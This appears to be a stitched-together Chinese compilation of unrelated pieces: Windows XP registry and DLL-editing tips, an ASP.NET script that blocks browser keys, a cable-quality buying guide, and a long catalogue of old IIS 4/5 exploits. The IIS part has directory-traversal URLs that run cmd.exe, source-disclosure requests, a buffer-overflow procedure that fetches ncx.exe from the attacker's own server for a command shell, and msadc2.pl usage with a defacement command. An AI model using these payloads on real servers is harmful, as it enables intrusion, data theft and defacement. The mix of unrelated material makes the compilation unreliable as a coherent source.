  在Windows XP中,当我们删除“我的文档”中的“我的音乐”、“图片收藏”等文件夹后,重新启动计算机后又会产生这几个文件夹。其实,要想彻底删除“我的音乐”、 “图片收藏”等文件夹,我们只要先在Windows“运行”对话框中输入“Regsvr32 /u mydocs.dll”这个命令,然后就可以彻底删除它们。

  44、禁止任务栏保存修改

  在日常的教学过程中,经常发现学生有意无意地修改任务栏的属性。造成下次上机时任务栏、时间图标等信息不能正常显示。通过对注册表的修改可以让系统对所作修改不进行保存,当重新启动后,系统自动恢复到原来的设置。

  单击“开始→运行”,键入“Regedit”后回车,打开注册表编辑器,依次展开[HKEY_CURRENT_USERsoftwareMicrosoftWindowscurrentversion  oliciesExplorer]分支,在右侧窗口中单击鼠标右键,选择“新建→DWORD值”命令,新建一个名为“nosavesettings”的DWORD值,并将其值设置为“1”即可。

  45、巧借Windows XP文件加速启动Windows 2000

  大家一定感觉Windows XP的启动速明显比2000的快很多,这是因为它对主要启动文件NTDETECT.COM和NFLDR(此文件没扩展名,两个文件都在系统分区根目录下)作了优化,我们只要在相应语言版本的Windows XP系统下复制这两个文件至Windows 2000系统分区根目录下覆盖原文件即可。

一、DLL文件常识

  DLL是Dynamic Link Library的缩写,意为动态链接库。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可有多个DLL文件,一个DLL文件也可能被几个应用程序所共用,这样的DLL文件被称为共享DLL文件。DLL文件一般被存放在C:WindowsSystem目录下

  二、修改DLL文件的具体应用

  在系统的组策略和注册表中,我们可以修改一些键值来优化我们的系统,并加强操作系统的安全性。可是,对于限制下载、禁止删除文件等功能,我们无法通过上述的操作来完成,这只有通过修改系统DLL文件来实现。目前,我们通过修改系统的DLL文件,可以实现禁止删除文件、禁止IE下载、禁止IE另存为、禁止文件打开方式等功能。

  三、系统中部分DLL文件的功能

  1、Browselc.dll IE所需要调用的库文件DLL结构雏形就是它了

  2、Shdoclc.dll 系统窗口及设置等,如删除文件、重命名

3、Shell32.dll 系统窗口及设置等,如删除文件、重命名

  4、Cryptui.dll IE控件下载及提示对话框程序

  四、修改DLL文件的方法

  1、下载DLL文件修改工具EXESCOPE6.0-6.3或6.4工具

  2、获取Browselc.dll、Shdoclc.dll、Shell32.dll和Cryptui.dll这几个链接文件。在找这几个文件时,最好将其他机器的硬盘,挂接在本机中,然后用本机的操作系统启动并复制这几个文件。

  3、在修改DLL文件的时候,打开该键值,在右面的对话框中将所要修改的键值禁用即可,不要删除,以备日后恢复

五、DLL文件修改秘籍

  1、禁止下载的修改方法:打开Shdoclc.dll修改资源–对话框—4416,将4416键值禁用即可。

  2、禁止网页添加到收藏夹,打开Shdoclc.dll修改资源–对话框—21400,将该键值禁用即可。

  3、禁止恶意网页加载控件,修改Cryptui.dll文件,要同时修改5个地方才能完全禁止 资源–对话框—130 资源–对话框—230 资源–对话框—4101 资源–对话框—4104 资源–对话框—4107 将以各对话框中的相应键值,修改成为禁用就可以了。

  4、禁止系统删除文件修改Shell32.dll,这个文件需要修改5个地方才可以禁止系统删除文件。资源–对话框—1011 资源–对话框—1012 资源–对话框—1013 资源–对话框—1021 资源–对话框—1022 将以上五个地址的键值禁用就可以了!

  5、禁止文件被改名,修改shell32.dll,有2个地方需要修改资源–对话框—1018 资源–对话框—1019 将以上两处的相应键值,修改为禁用就可以了!

  6、禁止运行菜单,修改shell32.dll,将资源–对话框—1018键值设置为禁用。

  7、禁止系统文件被挪动修改shell32.dll,需要修改4个地方 资源–对话框—1014 资源–对话框—1015 资源–对话框—1016 资源–对话框—1017

  8、禁止目标另存为,修改Shdoclc.dll文件,需要修改3个地方 资源–菜单–258—257 资源–菜单–258—252 资源–菜单–24641–2268 在这个修改中,我们要把各对应的键值删除。打开该键值后,右键菜单中有删除。在资源–菜单–24641—2268中,有多项该键值,请逐一删除。

  9、禁止自定义文件夹选项修改Shell32.dll文件,需要修改以下4个地方 资源–菜单–215—28719 资源–菜单–216—28719 资源–菜单–217—28719 资源–菜单–216—28719 找到以上四处键值,直接需要删除后即可,而不是禁用。

  10、禁止IE文件夹选项,修改Browselc.dll文件,需要修改3个键值 资源–菜单–263 (这里有多个请删除)—41251(删除) 资源–菜单–266(也有多个请删除)—41329 (删除) 资源–菜单–268—41251 (删除) 在上面的3个键值中,个别键值有多处,请逐一删除。

  11、禁止98文件共享控件,修改Msshrui.dll,需要修改2个地方 资源—对话框—- 1 — AutoRadioButton 资源—对话框—- 30 — AutoRadioButton 将以上两处的键值禁用即可。其他的选项,可以根据自己的需要进行修改。找到相应的功能键值,将不需要的功能,禁用就可以了。

  12、禁止文件的打开方式,修改Url.dll,需要修改2个地方 资源—对话框— 7000 资源—对话框— 7005 将以上两处的键值禁用即可。

  13、禁止更改系统桌面,修改Shdoc401.dll,有2处地方需要修改 资源—对话框— 29952— PushButton:浏览资源—对话框— 29952— PushButton:图案 将以上两处的键值禁用即可。

14、禁止系统文件夹自定义,修改Shd401lc.dll,有2处地方需要修改 资源—对话框— 29957 资源—对话框— 29958 将以上两处的键值禁用即可。

  15、禁止文件保存路径及打开,修改Comdlg32.dll,有2处地方需要修改 资源—对话框— 1547 资源—对话框— 1548 将以上两处的键值禁用即可。

  六、注意事项

  1、本文以Windows XP/2000操作系统的DLL文件修改为例,并不一定适用于Windows 98操作系统,请在修改DLL文件时注意。

  2、在禁止下载的操作中,除修改禁止下载的链接文件Shdoclc.dll外,还要修改禁止文件另存为的链接文件Shdoclc.dll。如果修改一个链接文件无法实现相应的功能,请查看其他链接文件中是否存在需要修改的键值。

  3、修改后的DLL链接文件,需要在DOS模式下导入并重新启动机器才有效。

  4、本文章只介绍了我们日常操作中经常用到的DLL修改选项,其他选项请参看DLL文件中的具体选项进行修改。

  5、在修改DLL文件前,请先备份系统原有的DLL文件,以备修改失败恢复.

在开发一个Asp.net系统的时候,经常需要自己订制浏览器的菜单,工具栏。
在最近的一个项目中,正好有机会负责了这个部分。
菜单使用的是AspNetMenu,好像不是很稳定,而且页面的刷新也很严重
工具栏使用的Microsoft提供的IEWebControl,工具栏效果不错,只是有时候会丢失事件,(郁闷,好像.net框架中经常会发生事件丢失)。

<script language=\"javascript\">
function DisableKey()
{
//8 退格键
//78 Ctrl+N
//37 Alt+ 方向键 ←
//39 Alt+ 方向键 →
//116 F5 刷新键
//82 Ctrl + R
//121 shift+F10
//115 屏蔽Alt+F4
//屏蔽 shift 加鼠标左键新开一网页
if (window.event.keyCode==8
||event.keyCode==78
||event.keyCode==37
||event.keyCode==39
||event.keyCode==116
||event.keyCode==82
||event.keyCode==121
||event.keyCode==115
||(window.event.srcElement.tagName == \"A\" && window.event.shiftKey))
{
alert(\‘请通过事物代码进行操作!\‘);
window.event.returnValue=false;
}

}
</script>
</HEAD>
<body MS_POSITIONING=\"GridLayout\" onKeyDown=\"DisableKey()\">

……………………

上边的代码基本上已经实现了,所需要屏蔽的键值。
好像已经完成了工作,但是是否每个页面都要复制这些代码呢?还在考虑之中!
请各位高手指点,应该可以说是一个如何架构系统界面的问题了:)

1. iis4hack缓冲溢出
主要存在于.htr,.idc.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exencx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat来连接你要检测的服务器:

c:>nc 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

2.msadc
IIS
MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help
[quack@chat quack]$ perl msadc2.pl -h
— RDS smack v2 – rain forest puppy / ADM / wiretrip —
Usage: msadc.pl -h { -d -X -v }
-h = host you want to scan (ip or domain)
-d = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s = run only step
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/
— RDS smack v2 – rain forest puppy / ADM / wiretrip —
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp
察看文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp
察看文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw
察看文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw
hit-highligting
功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消
这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (
这个一般为loopback使用)
一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL http://www.victim.com/default.asp::$DATA你就得到了源代码

 

8.ASP Dot Bug
在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。
http://www.victim.com/sample.asp.

9.ISM.DLL
这个漏洞是由Cerberus Information Security team.最早发现的,它运行在IIS4.05.0上面,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLL ISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL 程序把传递过来的文件打开和执行,但在ISM.DLL 截断信息之前,缓冲区发送 一个截断开的 .Htr 并会有一些时间去返回一些你要打开的文件内容. 除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL第一次装入内存时工作.CNNS发现追加+号到没有一次攻击这个问题,可以进行多次攻击。

http://www.victim.com/global.asa%20%20(…<=230)global.asa.htr

10. .idc & .ida Bugs
这个漏洞实际上类似ASP dot 漏洞,其能在IIS4.0上显示其WEB目录信息,很奇怪的说有些还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida? 后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端。
http://www.victim.com/anything.idc
或者 anything.idq

11.+.htr Bug
对有些ASAASP追加+.htrURL请求就会导致文件源代码的泄露:
http://www.victim.com/global.asa+.htr

12.NT Site Server Adsamples
通过请求site.csc,一般保存在/adsamples/config/site.csc中,攻击者 可能获得一些如数据库中的DSNUIDPASS的一些信息,如:

http://www.victim.com/adsamples/config/site.csc

13./iisadmpwd
IIS4.0
中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。 每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个 .htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制 loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
这样,攻击者可以通过暴力来猜测你的密码。

 

14.Translate:f Bug
泄露asp文件源代码 存在OFFICE 2000FRONTPAGE 2000Server Extensions中的WebDAV中, 当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f 后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁 为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS4.0上,所以在IIS4.0上也有这个漏洞。利用程序: trasn1.pl,trans2.pl

15.Unicode
IIS 4.0
IIS 5.0Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊 的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。

http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

可能需要察看以下几个目录
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.0rnrn
GET
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.0rnrn
GET
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.0rnrn
GET
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.0rnrn
GET
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.0rnrn
eeye
开发了工具包iishack1.5针对这一漏洞进行测试
16.iis5.0
缓冲溢出
微软Win 2K IIS
5
的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printerURL请求时,IIS
5
调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printerURL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。利用程序见iis5hack.zip

17.IIS CGI文件名二次解码漏洞
IIS
在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为".exe"".com"等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。
通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对"../""./"的检查,在某些条件下,攻击者可以执行任意系统命令。

例如,对于’’这个字符,正常编码后是%5c。这三个字符对应的编码为:
’%’ = %25
’5’ = %35
’c’ = %63
如果要对这三个字符再做一次编码,就可以有多种形式,例如:
%255c
%%35c
%%35%63
%25%35%63

因此,".."就可以表示成"..%255c""..%%35c"等等形式。在经过第一次解码之后,变成"..%5c"IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成".."。因此攻击者就可以使用".."来进行目录遍历,执行web目录之外的任意程序。

在组建局域网的过程中,人们往往会不惜重金去购买高档网卡、交换机、路由器,而忽略了这“不起眼”的网线质量。其实网线的质量对局域网的传输性能影响最直接,因此对网线进行测试是选购网线过程中的一个很重要的环节,只有多看、多测试才能在鱼龙混杂的网线市场中选到真正令自己放心的产品,也只有多测试,大家才能获得对网线的真实感受,为此笔者就和大家详细谈一谈如何对网线进行全方位测试。

  1、测试网线的速度

  对网线的传输速度进行测试是鉴别网线质量真伪的最有效手段;测试时为了更贴近实际使用环境,同时减少外界干扰环节,笔者建议采用双机直联的方式进行。同时为了保证测试的准确性,尽量使用质量好的品牌网卡,保证测试时不会发生硬件瓶颈现象;同时也要保证计算机系统干净、整洁,运行速度快,不然计算机本身的运行速度会影响网线传输速度。此外,在做连接网线时,尽量使用质量好的水晶头,也要保证线头做得规范,只有这样才能将外界因素对网线传输速度的影响降低到最小程度。

  2、检查网线柔韧性

  品质良好的网线在设计时考虑到布线的方便性,尽量做到很柔韧,无论怎样弯曲都很方便,而且不容易被折断。而目前市场上有许多奸商为了能获得高额销售利润,在本来是纯铜质量的网线中参入了其他廉价的金属成分,这样网线的成本就会下降,但网线本身的质量和性能却大不一样,表现出来的现象是网线线缆的质地不再那么柔软,网线的传输速度也大打折扣。要是在布线的过程中,反复弯曲这样的网线的话,网线里面的铜线缆可能就会被折断。当然如果发现网线太柔软的话,也要注意它可能是假冒伪劣产品。

  3、测试网线的可燃烧性

  一般来说组成网线的材料必须要求有抗燃烧性,不然的话出现个火灾什么的话,那就损失惨重了。因此大家在选择网线时,一定要检查网线外皮的可燃烧性,以辨别真伪。在具体测试时,大家可以先用剪刀切取2厘米左右长度的网线外皮,然后用打火机对着外皮燃烧,正品网线的外皮会在焰火的烧烤之下,逐步被熔化变形,但外皮肯定不会自己燃烧起来;要是发现网线的外皮禁不住烈火的考验,一点就燃烧起来的话,那网线的传输速度再怎么高也应该放弃选择,毕竟这样的网线在布线工程中是很不安全的,使用它会留下很大的安全隐患。笔者曾经找来一段正品网线与伪劣网线,并同时用打火机点燃它们,发现6秒钟后,正品网线只是冒白烟并随着时间推移,逐步熔化变形,而伪劣网线不到2秒钟,就被轻易点燃了,而且伴有大量黑烟产生。

  4、测试网线的抗温性

  布线工程中对网线抵抗外界温度的变化有相当高的要求,不说能抵抗任何环境变化吧,至少网线不能在高温或者低温环境下被软化或者被冻裂。为了保证在高温环境下网线的性能不受影响,正品网线采用的外皮材料可以抵抗高达50度左右的高温考验,不会出现类似网线被软化或者变形的现象发生。如果截取一小段网线外皮,放在火炉旁边一段时间,发现该外皮比正常的外皮变软的话,就说明该网线的质量肯定不过硬。

  5、识别网线外皮上的标志

  在实际挑选网线的时候,有时缺少测试的环境或者条件,无法通过上面的方法对网线的质量或者材料进行测试时,大家不妨通过观察网线外皮上的标识来鉴别网线的真伪。通常情况下,正规品牌的网线外皮上都有网线的种类标识以及厂家的商标,例如CAT5标识是表示该网线是五类线,CAT6标识就代表网线是六类线;如果网线的外皮什么标识也没有的话,大家就应该提高警惕,想办法创造条件,来按照上面的方法对网线进行测试鉴别。

  6、测试网线的绕距

  大家知道普通的双绞线是由四组相互缠绕的网线连接在一起的。所谓网线的绕距其实就是网线纽饶一节的长度,通常人们使用绕距来表示每对线对相互缠绕的紧密程度,而且为了能将每对线对相互之间产生的串扰程度降低到最小,常常将线对按逆时针方向紧密地缠绕在一起,而且每对线对采用的绕距是不应该相同的。但许多生产网线的奸商为了减少制作环节、降低工艺成本,常常将四对线对按照同一绕距进行缠绕,甚至许多劣质网线的绕距竟然高达几个厘米,这样线对之间的串扰就大增,严重影响了网线的性能。

  7、测试外皮的伸展性

  考虑到网线在布线时经常需要弯曲,因此许多正规厂商在制作网线都给外皮留有了一定的伸展性,以保证网线在弯曲时不受损伤。因此大家双手用力拉正规网线时,发现外皮都具有伸展性。如果用力将网线外皮拉断,或者外皮在外力作用下,有裂缝现象的话,就说明该网线的质量有问题。

  相信看了上面的内容,不少朋友肯定会大吃了一惊,平时有可能从不在意网线的质量,没有想到小小网线里面竟然有那么多的“玄机”。还记得笔者的一个朋友曾经花了250元买了一箱网线,当时他还为买到了内部价而得意时。结果那些网线在30米左右的距离上也只能达到1MB/S的速度,显然是上了奸商的当了!在这里,笔者呼吁各位朋友以后在挑选网络产品的时候都应该提高警惕,特别是挑选那些从来,或者很少关心过质量的产品或者设备时,更要多点质量意识、长个心眼。